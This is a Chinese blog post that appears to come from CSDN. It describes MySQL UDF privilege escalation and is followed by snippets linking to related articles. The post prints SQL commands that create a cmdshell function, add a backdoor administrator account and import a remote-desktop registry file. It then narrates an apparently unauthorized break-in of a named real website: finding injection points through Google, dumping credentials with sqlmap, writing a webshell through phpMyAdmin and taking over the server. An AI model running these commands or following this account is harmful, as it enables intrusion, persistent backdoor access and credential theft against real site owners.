udf提权的一次学习

最新推荐文章于 2024-07-10 12:22:39 发布
最新推荐文章于 2024-07-10 12:22:39 发布
阅读量2.6k 收藏
点赞数
分类专栏: hack那些事
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013995946/article/details/44320115
版权

udf提权。利用条件:root权限的mysql账号密码。提权方法:具体语句如下:
  create function cmdshell returns string soname ‘udf.dll’;
  select cmdshell(’net user iis_user 123 /add’);
  select cmdshell(’net localgroup administrators iis_user /add’);
  select cmdshell(’regedit /s d:\web\3389.reg’);
  drop function cmdshell;
  select cmdshell(’netstat -an’);
  
要测试的站点:http://www.xiyutm.com/,至于怎么找到的呢?google大法好。这里写图片描述
随便点进去一个url。。。都有注入点。。。这里写图片描述
放到sqlmap里面跑这里写图片描述
然后很幸运的跑到了后台的帐号和密码,还有数据库的帐号和密码,放到md5上面,解密需要money,,,放到习科里面,雷锋的菊苣们给了明文。。。。这里写图片描述
然后呢?进入后台,找不到上传点。绝望了,,,然后和学长get了新技能,,,上了phpmyadmin,,,用数据库写一句话,,,很幸运,数据库的权限是root。。。这里写图片描述
然后连接小马,,,开始udf提权。。。因为这个站点的条件很顺,,,所以直接上传了一个udf.php,,,连接数据库,net user呗,,,
然后服务器被搞定了。。。这里写图片描述看了一下,c盘只剩下几十kb了。。。。真牛。。。

后记:昨天晚上的时候,其实已经写完了,要比篇更加详细一些。但是当时写完的时候,正在和妹子聊qq,切换太快,尼玛,,,突然火狐浏览器一刷,,,没有了。。。加上这几天天气潮湿,感冒一直不好,,,就这样简单的记录一下吧。。。

中国好利鹏
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
MysqlUDF提权
热门推荐
越努力 越自由
11-07 1万+
udf提权通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql权限 —> 系统权限。提权限制条件挺多,如下先获取mysql的权限(连接上了mysql数据库)Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的权限,即secure_file_priv的值为空。
windwos下mysqludf提权
最新发布
weixin_45653478的博客
07-10 1065
UDF(User Defined Functions)即用户自定义函数,通过这种方式可以实现命令执行,其原理是通过lib_mysqludf_sys提供的函数可以执行系统命令 攻击场景:同之前利用日志写WebShell的场景,即堆叠注入或MySQL终端权限或类似phpMyAdmin数据库管理工具后台权限等。
MySQL提权——udf提权
hackzkaq的博客
04-11 6460
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员——逍遥子 一、前期准备 1.Mysql udf简介 MySQL udf(user definedfunction,用户定义函数),为用户提供了一种高效创建函数的方式。udf函数按其运行模式可以分为单次调用型和聚集函数型两类,单次调用型函数能够针对数据库查询的每一行记录进行处理,聚集函数型用于处理Group By等聚集查询。 2.udf提权原理 udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf提权的可能
渗透测试:MySQL数据库UDF提权详解
Bossfrank的博客
06-30 2860
本文介绍了渗透测试的常规提权方法——MySQL UDF提权。全面详解了UDFUDF提权原理与提权过程。以vulhub靶机pWnOS2.0为例,详解了提权的过程。读者可根据本文进行复现学习
MySQL提权UDF提权
2301_76227305的博客
06-08 1253
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf提权本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
udf提权PHP代码
10-30
udf提权PHP代码
udf 提权用的
05-28
udf 提权用的
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
UDF提权(linux)
m0_66299232的博客
05-23 1400
secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权。大概就是将程序进行gcc编译,然后再登录mysql进行创建一个表,插入.so文件,创建自定义函数进行越权操作。#secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权。#secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出限制,此时可提权
MySQL UDF 提权
small_cat's home
10-22 1874
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 提权是通过这样的方法来实现获取对方主机的system的shell权限,从而达到提权的目的。要实现 UDF 提权需要有一个动态链接库文件。
【数据库提权Mysql-UDF 提权
网络安全从业者的学习笔记
06-24 759
UDF(user defined function),用户自定义函数。UDF提权利用数据库将地权限的shell提权到高权限。当我们通过webshell获取到Apache服务器的权限,而获取到的用户只是网络服务权限www或其他普通用户,则我们可以利用mysqlUDF提权获取到管理员权限。
Linux提权mysql UDF提权
waxcj的博客
12-16 2105
linux mysql数据库提权
mysql udf提权
weixin_60719780的博客
03-16 1281
udf提权只要是因为udf.dll文件,攻击者通过编写调用cmd或者shelludf.dkk文件,并且导入到一个指定的文件夹目录下,创建一个指向udf.dll的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。查询下的MySQL版本,这里我的是5.7.26,是大于5.1版本的,也就是说,我们需要找到lib\plugin这个目录,然后将我们的udf.dll文件写进去,其实这里的目录需要我们自己创建。前面的是为了铺垫,后面我们提权需要使用这个16进制的udf.dll文件;
MySQL提权UDF
不曾扬帆,何以至远方
07-01 1319
MySQL UDFf提权
linux环境下的MySQL UDF提权
黑战士的博客
04-25 1505
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。###利用前提mysqlfuncfunc。
渗透测试:数据库UDF提权(linux)
qq_63442530的博客
04-01 1856
UDF:User Defined Function 用户自定义函数,MySQL数据库的初衷是用于方便用户进行自定义函数,方便查询一些复杂的数据,同时也有可能被攻击者利用,使用udf进行提权提权原理:攻击者通过编写,能调用cmd或者shell的共享库文件(window为.dll,linux为.so),并且导入到一个指定的文件夹目录下,在数据库中通过导入的共享库文件创建自定义函数,该自定义函数功能依照于共享库文件的功能,从而在数据库中调用该自定义函数能够使用系统命令。
【数据库提权MySQL UDF提权 (Window环境)
做自己喜欢的事,并将其发挥到极致!
03-16 2017
本文章仅记录某次内网渗透过程中遇到的MySQL 采用UDF提权等方式进行获取权限,文章中内容仅用于技术交流,切勿用于非授权下渗透攻击行为,慎重!!!UDF(Userdefined function)可以翻译为用户自定义函数,其为mysql的一个拓展接口,可以为Mysql增添一些函数,对MySQL的功能进行扩充,然后就可以在MySQL中进行使用这些函数了。
mysql udf 提权
03-06
2. 你需要找到一个合适的提权方法,并编写相应的UDF函数。 3. 你需要知道目标MySQL服务器的版本和配置,以确保你选择的提权方法适用于该版本和配置。 请注意,提权是一种潜在的安全风险行为,应该谨慎使用,并且仅...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值